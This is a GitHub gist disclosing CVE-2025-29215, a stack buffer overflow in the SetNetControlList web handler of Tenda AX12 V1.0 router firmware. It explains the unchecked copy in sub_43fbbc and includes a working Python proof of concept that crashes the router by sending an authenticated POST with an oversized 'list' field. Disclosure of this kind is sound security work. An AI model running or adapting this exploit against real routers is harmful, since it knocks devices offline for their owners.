Skip to content

Instantly share code, notes, and snippets.

@isstabber

isstabber/tenda_ax12v1_setnetcontrollist_stack_overflow.md Secret

Last active March 21, 2025 01:11
Show Gist options
  • Save isstabber/a42b32a7dcd401d79c5866247329cddd to your computer and use it in GitHub Desktop.
Save isstabber/a42b32a7dcd401d79c5866247329cddd to your computer and use it in GitHub Desktop.
Download ZIP
Raw
tenda_ax12v1_setnetcontrollist_stack_overflow.md

CVE-ID

CVE-2025-29215

Information

Vendor of the products: Tenda

Vendor's website: https://www.tenda.com.cn/

Reported by: Zhao Jiang Ting(sta8r9@163.com)

Affected products: Tenda AX12 V1.0 router

Affected firmware version: US_AX12V1.0in_V22.03.01.46_cn_TDC01.bin

Firmware download address: AX12 V1.0 升级软件

Overview

A stack overflow vulnerability exists in Tenda AX12 V1.0 firmware V22.03.01.46_CN because the /goform/SetNetControlList sub_43fdcc function does not check the length of the field value in the request body. And copy its contents directly into the stack buffer, the attacker sends a post request after authorization containing a large amount of junk data in the list field, which can cause a ddos attack.

Vulnerability details

Loopholes in/goform/SetNetControlList sub_43fdcc function interface.img

The web_get_values function reads the value of the list field from the request body, stores it in variable v1, and passes v1 to sub_43fbbc.

img

The specific overflow occurs in the sub_43FBBC function, where the parameter value is copied into the stack buffer without length checking, thus creating a stack overflow.

img

Poc

Send the following POST request to /goform/SetNetControlList.The ip address and passwd variable in the poc need to be modified themselves.

import requests

def stackk_over(passwd,payload):

    url = "http://192.168.30.149/goform/SetNetControlList"

    headers = {

    "Host": "192.168.30.149",

    "Connection": "keep-alive",

    "Content-Length": "31",

    "Pragma": "no-cache",

    "Cache-Control": "no-cache",

    "Upgrade-Insecure-Requests": "1",

    "Origin": "http://192.168.30.149",

    "Content-Type": "application/x-www-form-urlencoded",

    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0Safari/537.36 Edg/121.0.0.0",

    "Accept":

    "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed�exchange;v=b3;q=0.7",

    "Referer": "http://192.168.30.149/goform/main.html",

    "Accept-Encoding": "gzip, deflate",

    "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",

    "Cookie": f"password={passwd}",

    }

    data = {

    "list": payload,

    }

    response = requests.post(url, headers=headers, data=data)

    print("status:",response.status_code)

    print(response.text)



payload="a"*0x300

passwd="25d55ad283aa400af464c76d713c07adijyded"

stackk_over(passwd,payload)

Attack Demonstration

Access the SetNetControlList interface after authorization, send a post request, and set the list field to a large amount of junk data, beyond the 256 bytes range.The ip address and passwd variable in the poc need to be modified themselves. A segmentation fault occurs when passwd in the poc is modified to run the poc directly and view router logs.

img

impact

Triggering a stack overflow causes the program to terminate abnormally, which can result in a ddos attack.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment